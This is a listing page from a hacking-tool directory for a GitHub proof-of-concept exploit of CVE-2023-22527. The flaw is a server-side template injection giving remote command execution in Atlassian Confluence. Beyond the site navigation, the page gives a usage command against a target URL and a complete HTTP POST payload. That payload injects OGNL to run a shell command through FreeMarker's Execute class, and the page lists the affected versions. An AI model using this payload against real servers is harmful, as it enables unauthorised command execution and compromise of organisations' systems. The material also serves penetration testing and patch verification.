Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-22527 — CVE-2023-22527 | RCE using SSTI in Confluence | Kitploit
Tools/GitHubGitHub/kh4sh3i/cve-2023-22527
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubkh4sh3i/cve-2023-22527

CVE-2023-22527

CVE-2023-22527 | RCE using SSTI in Confluence

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share



CVE-2023-22527

CVE-2023-22527 | RCE using SSTI in Confluence

Description

  • CVE-2023-22527 refers to an ServerSide template injection vulnerability in freemarker engine that allows users to execute command on the webserver.
  • This code is a proof-of-concept (PoC) script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence.

USAGE

root@kitploit:~
python3 CVE-2023-22527.py -u  http://target.com

Payload

root@kitploit:~
POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"id"}))

Affected versions

root@kitploit:~
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

References

  • projectdiscovery
Download Tool